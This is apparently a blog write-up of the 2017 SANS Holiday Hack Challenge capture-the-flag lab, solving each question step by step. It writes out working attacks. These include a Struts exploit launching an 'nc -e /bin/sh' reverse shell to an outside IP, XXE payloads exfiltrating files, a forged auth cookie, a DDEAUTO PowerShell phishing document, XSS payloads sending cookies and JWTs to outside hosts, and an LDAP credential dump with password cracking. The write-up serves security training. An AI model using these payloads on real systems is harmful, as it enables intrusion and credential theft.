SANS Holiday Hack Challenge - Part 2

Part two of security researcher Roy Shoemake's SANS Holiday Hack Challenge, lets take a closer look at the primary technical challenges and overcome them.

SANS Holiday Hack Challenge - Part 2

Part two of security researcher Roy Shoemake's SANS Holiday Hack Challenge, where we find out who the villains are and what their motive is. Lets take a closer look at the primary technical challenges and how to overcome them.

Main Technical Challenges

Question #1 – What is the title of that page?

Visit the North Pole and Beyond at the Winter Wonder Landing Level to collect the first page of The Great Book using a giant snowball. What is the title of that page?

Answer: About This Book

Not a technical challenge but instead a snowball challenge. To find this page of the book I had to redirect a snowball over the Great Book Page to unlock it.

Note: The Great Book Page #5 is also in a separate snowball challenge. All other pages are found in the technical challenges.

Question #2 – Find the Great Book Page Topic and Alabaster’s Password

Investigate the Letters to Santa application at https://l2s.northpolechristmastown.com.

What is the topic of The Great Book page available in the web root of the server?

What is Alabaster Snowball’s password?

Answer 1: On the Topic of Flying Animals

Solution

Upon visiting https://l2s.northpolechristmastown.com I view the HTML source code for any clues. I notice a hidden link to http://dev.northpolechristmastown.com, as the screenshot below demonstrates.

word-image-26

Visiting the dev link I see another clue in the source indicating the site might be vulnerable to Apache Struts.

word-image-27

After testing a few different exploits for Apache Struts I found one that works for CVE-2017-9805. On a remote server, I start a listener on port 80, as the below screenshot shows.

word-image-28

I use a Python script and issue the following command to establish my reverse shell [1].  

sans-struts.py –exploit –url ‘https://dev.northpolechristmastown.com/orders/4’ -c ‘nc -e /bin/sh 159.89.40.52 8080’

To clean up the reverse shell I use the following python command:

python -c ‘import pty;pty.spawn(“/bin/bash”)’

I start enumerating the Letters to Santa server and in the html directory I find a PDF called GreatBookPage2.pdf.

alabaster_snowball@hhc17-apache-struts1:/var/www/html$ ls | grep GreatGreatBookPage2.pdf

Answer 2: stream_unhappy_buy_loss

Solution

After enumerating /var/www/html I knew there might be some information in the directory serving the Apache Struts content, which was located under /opt/apache-tomcat.

I do a quick grep to see if I could locate any passwords for alabaster snowball using the following commands:

grep -nr ‘password*’ /optgrep -nr ‘alabaster_snowball*’ /opt

The grep returned a username and password in the OrderMySql.class file located at:

cat /opt/apache-tomcat/webapps/ROOT/WEB-INF/classes/org/demo/rest/example/

<snip>final String host = “localhost”;final String username = “alabaster_snowball”;final String password = “stream_unhappy_buy_loss”;String connectionURL = “jdbc:mysql://” + host + “:3306/db?user=;password=”;Connection connection = null;Statement statement = null;<snip>

Success! I can now use the information to log directly into the server with SSH.

Note: For most of the challenges I use the following SSH command to set up a socks forwarder. This allowed me to use proxychains or other tools to connect directly to the 10.142.0.0/24 network.

ssh -D localhost:8082 [email protected]

Question #3 – What is the file server share name?

The North Pole engineering team uses a Windows SMB server for sharing documentation and correspondence. Using your access to the Letters to Santa server, identify and enumerate the SMB file-sharing server.

What is the file server share name?

Answer: FileStor

Solution

I know the primary objective is to find an SMB server. Using nmap I complete a scan of the 10.142.0.0/24 with the following nmap command.

nmap -Pn -p445 10.142.0.0/24

The scan results show one IP with port 445 open.

Nmap scan report for hhc17-smb-server.c.holidayhack2017.internal (10.142.0.7)

Host is up (0.0012s latency).
PORT STATE SERVICE445/tcp open microsoft-ds

I use the following command to enumerate the SMB share:

smbmap –r –u alabaster_snowball –p stream_unhappy_buy_loss –d workgroup –H localhost

From this, I can determine that the file share name is FileStor and that alabaster_snowball has read access to files under this share.

word-image-29

I use smbclient to connect and interact with the FileStor share with the following command:

smbclient //localhost/FileStor –U alabaster_snowball

This provides me a command line prompt which I use to download the files with the command:

mget *

Now I have all the files on my local machine.

Question #4 – What can you learn from The Great Book page in the email server?

Elf Web Access (EWA) is the preferred mailer for North Pole elves, available internally at http://mail.northpolechristmastown.com.

What can you learn from The Great Book page found in an e-mail on that server?

Answer: That the Lollipop Guilds engages in offensive operations against the north pole.

Location of the book: http://10.142.0.5/attachments/GreatBookPage4_893jt91md2.pdf

Solution

I use the following payload to bypass authentication. This works because the first 16 bytes of the ciphertext are used for the initialization vector (IV). Essentially, the first 16 bytes of the ciphertext are removed. I added some hex in the ciphertext portion of the cookie that would result in a null value and match the plaintext, also being a null value.

EWA={“name”:”[email protected]”,”plaintext”:””,”ciphertext”:”bb8dacc4678800915189af”}

word-image-30
word-image-31

Question #5 – Infractions, threat moles, who is throwing snowballs

How many infractions are required to be marked as naughty on Santa’s Naughty and Nice List?

What are the names of at least six insider threat moles?

Who is throwing the snowballs from the top of the North Pole Mountain and what is your proof?

Answer 1: Looks like four infractions

How many infractions are required to be marked as naughty on Santa’s Naughty and Nice List?

It appears there must be four infractions to be marked on the naughty list. This was determined by reviewing people who are on the nice list versus those on the naughty list.

Infractions were determined by visiting https://nppd.northpolechristmastown.com/infractions. A CSV file was obtained earlier from the FileStore server with a list of names and if they are naughty or nice.

Answer 2: See the list below

What are the names of at least six insider threat moles?

Two of the inside threat moles are:

Boq Questrian
Bini Aru

These two moles were determined from the Munchkin Mole Advisory found in the FileStor. Using the information from these two confirmed moles I cross-referenced their infractions with others who are on the naughty list. I determined four additional moles from the information.

Erin Tran
Wesley Morton
Nina Fitzgerald
Lance Montoya

Answer 3: Abominable Snow Monster

Who is throwing the snowballs from the top of the North Pole Mountain and what is your proof?

The answer was obtained from a chat message as shown in the screenshot below. The chat was found playing the snowball challenges.

word-image-32

Question #6 – What it the title of The Great Book page?

The North Pole engineering team has introduced an Elf as a Service (EaaS) platform to optimize resource allocation for mission-critical Christmas engineering projects at http://eaas.northpolechristmastown.com.

Visit the system and retrieve instructions for accessing The Great Book page from C:greatbook.txt. Then retrieve The Great Book PDF file by following those directions. What is the title of The Great Book page?

Answer: The dread-inter dimensional tornadoesSolution

An earlier Nmap scan indicated that 10.142.0.13 is the eaas.northpolechristmastown.com server.

Nmap scan report for eaas.northpolechristmastown.com (10.142.0.13)
Host is up (0.00040s latency).
Not shown: 65531 filtered ports
PORT STATE SERVICE
80/tcp open http
3389/tcp open ms-wbt-server
5985/tcp open wsman
5986/tcp open wsmans

Upon visiting the site, I see right away it is parsing XML files. I find an upload functionality that parses .xml files.

word-image-33

I create a file named file.xml with the following contents to confirm the vulnerability:

<?xml version=”1.0″ ?><!DOCTYPE r [<!ELEMENT r ANY ><!ENTITY sp SYSTEM “http://159.203.168.192/test.txt”&gt;]><r>&sp;</r>

On the remote server, I use nc to listen on port 80.

word-image-34

I see the GET request for /test.txt and this confirms the Elf server is vulnerable to out-of-band XXE attacks [2].

I customize the payload to gather some information about the server. I know the file of interest is located at C:greatbook.txt from the original question. I create a file named oob.dtd with the following contents and host it on my remote server:

<!ENTITY % all “<!ENTITY send SYSTEM ‘http://159.203.168.192/?collect=%file;’>”&gt;%all;

On my local machine, I modify the original file.xml to look like:

<?xml version=”1.0″ ?><!DOCTYPE data [<!ENTITY % file SYSTEM“file:///c:/greatbook.txt”><!ENTITY % dtd SYSTEM“http://159.203.168.192/oob.dtd”&gt;%dtd;]><data>&send;</data>

I monitor the Apache Logs on the remote server and see a successful 200 response and now I have access to greatbook6.pdf.

35.185.118.225 – – [17/Dec/2017:15:44:13 +0000] “GET /oob.dtd HTTP/1.1” 200 289 “-” “-”35.185.118.225 – – [17/Dec/2017:15:44:13 +0000] “GET /?collect=http://eaas.northpolechristmastown.com/xMk7H1NypzAqYoKw/greatbook6.pdf HTTP/1.1” 200 11576 “-” “-“

Question #7: What does the Great Book page describe?

Like any other complex SCADA systems, the North Pole uses Elf-Machine Interfaces (EMI) to monitor and control critical infrastructure assets. These systems serve many uses, including email access and web browsing. Gain access to the EMI server through the use of a phishing attack with your access to the EWA server. Retrieve The Great Book page from C:GreatBookPage7.pdf. What does The Great Book page describe?

Answer: Explaining the Great Shcism and the witches remaining in Oz.

From the earlier email server, there were clues indicating that Alabaster Snowball is desperately looking for a Gingerbread Cookie Recipe. He was so desperate he mentioned that he would open any .docx with the words Gingerbread Cookie Recipe in it.

The objective is to obtain the GreatBookPage7.pdf so I opted for a simple PowerShell command using DDEAUTO in a .docx file [3].

The command simply copies GreatBookPage7.pdf over to the inetpubwwwroot so I can grab it through IIS.

DDEAUTO c:\Windows\System32\cmd.exe “/k powershell.exe -NoP -sta -NonI -W Hidden $e=(copy-item -path c:\GreatBookPage7.pdf -destination c:\inetpub\wwwrooth9t3ibuw9h.pdf);powershell -e $e “

Question #8: Who wrote the letter?

Fetch the letter to Santa from the North Pole Elf Database at http://edb.northpolechristmastown.com. Who wrote the letter?

Answer: The Wizard

For this challenge, the webpage prompts for a username and password.

word-image-35

There is also a page to contact support for a lost password reset.

word-image-36

It looks like the ticket support request form is vulnerable to stored XSS. I use the following payload to grab the session cookie:

#”><img src=M onerror=alert(window.location=’http://138.197.15.243/?cookie=’+document.cookie);>

It returned the following session cookie:

35.196.239.128 – – [17/Dec/2017 20:09:18] “GET /?cookie=SESSION=hxxer50N2e1C2AFt5X06 HTTP/1.1” 200 –

I tried using the session cookie to gain access but had no luck. So…in reviewing the source, I found the following code referencing a token stored locally [4]:

if (!document.cookie) {window.location.href = ‘/’;} else {token = localStorage.getItem(“np-auth”);if (token) {$.post( “/login”, { auth_token: token }).done(function( result ) {if (result.bool) {window.location.href = result.link;}})}}

I changed my XSS payload to grab the JSON Web Token.

#”><img src=M onerror=alert(window.location=’http://165.227.219.108/?cookie=’+localStorage.getItem(“np-auth&#8221;));>

Now I have the Web Token.

35.196.239.128 – – [20/Dec/2017 21:20:31] “GET /?cookie=eyJhbGciOiJIUzI1NiIsInR5cCI6IkpXVCJ9.eyJkZXB0IjoiRW5naW5lZXJpbmciLCJvdSI6ImVsZiIsImV4cGlyZXMiOiIyMDE3LTA4LTE2IDEyOjAwOjQ3LjI0ODA5MyswMDowMCIsInVpZCI6ImFsYWJhc3Rlci5zbm93YmFsbCJ9.M7Z4I3CtrWt4SGwfg7mi6V9_4raZE5ehVkI9h04kr6I HTTP/1.1” 200 –

After decoding the base64 value I get:

{“alg”:”HS256″,”typ”:”JWT”}.{“dept”:”Engineering”,”ou”:”elf”,”expires”:”2017-08-16 12:00:47.248093+00:00″,”uid”:”alabaster.snowball”}.3¶x#p­­kxHl¬ƒ¹¢6V9_⶙ —¡VB=‡N$r6I

I try changing the “alg” to “None” and removing the signature leaving the dot at the end but the application didn’t accept it. I also try cracking the JWT but that didn’t return anything after trying some popular wordlists.  I go back to my notes…

In my earlier enumeration, I found something else of interest located under the /dev directory – a LDIF template. I also knew that port 389 was open from an earlier Nmap scan.

#LDAP LDIF TEMPLATE
dn: dc=comdc: comobjectClass: dcObjectdn: dc=northpolechristmastown,dc=comdc: northpolechristmastownobjectClass: dcObjectobjectClass: organizationdn: ou=human,dc=northpolechristmastown,dc=comobjectClass: organizationalUnitou: humandn: ou=elf,dc=northpolechristmastown,dc=comobjectClass: organizationalUnitou: elfdn: ou=reindeer,dc=northpolechristmastown,dc=comobjectClass: organizationalUnitou: reindeerdn: cn= ,ou= ,dc=northpolechristmastown,dc=comobjectClass: addressbookPersoncn:sn:gn:profilePath: /path/to/users/profile/imageuid:ou:department:mail:telephoneNumber:street:postOfficeBox:postalCode:postalAddress:st:l:c:facsimileTelephoneNumber:description:userPassword:

I was able to dump the database using the following command:

proxychains ldapsearch -h 10.142.0.6 -p 389 -x -b “dc=northpolechristmastown,dc=com”

Success! I was able to use Santas login to access the login page after decoding the base64 userPassword and cracking the MD5 value. It turns out that I didn’t need the JWT or cookie after all.

<snip>
# santa, human, northpolechristmastown.comdn: cn=santa,ou=human,dc=northpolechristmastown,dc=comobjectClass: addressbookPersonc: UScn: santadepartment: administratorsdescription: A round, white-bearded, jolly old man in a red suit, who lives atthe North Pole, makes toys for children, and distributes gifts at Christmastime. AKA – The Boss!facsimileTelephoneNumber: 123-456-8893gn: Santal: North Polemail: [email protected]: humanpostOfficeBox: 126postalAddress: Candy StreetpostalCode: 543210profilePath: /img/elves/santa.pngsn: Clausst: AKstreet: Santa Claus LanetelephoneNumber: 123-456-7893uid: santa.claususerPassword:: Y2RhYmViOTZiNTA4ZjI1Zjk3YWIwZjE2MmVhYzVhMDQ=
<snip>

Base64 Decoded Value: cdabeb96b508f25f97ab0f162eac5a04MD5

Cracked: 1iwantacookieOnce

I accessed the web application I located the letter to Santa under Account > Santa Panel.

word-image-37

Question #9: Who is the villain and what’s the motive?

Which character is ultimately the villain causing the giant snowball problem. What is the villain’s motive?

Answer: Glinda, the Good Witch – Motive is money.

According to the last chat message (as in the screenshot) the ultimate villain is Glinda, the Good Witch. Her primary goal is to make money by causing a war between the North Pole and Oz. The chat was found playing the snowball challenges.

word-image-38

References

[1] CVE-2017-9805 Script – https://github.com/mazen160/struts-pwn
[2] https://www.acunetix.com/blog/articles/band-xml-external-entity-oob-xxe/
[3] https://sensepost.com/blog/2017/macro-less-code-exec-in-msword/
[4] https://developer.mozilla.org/en-US/docs/Web/API/Storage/LocalStorage

The beautiful artwork used to head this article is called 'Cozy Igloo' and was created by Runar Finanger.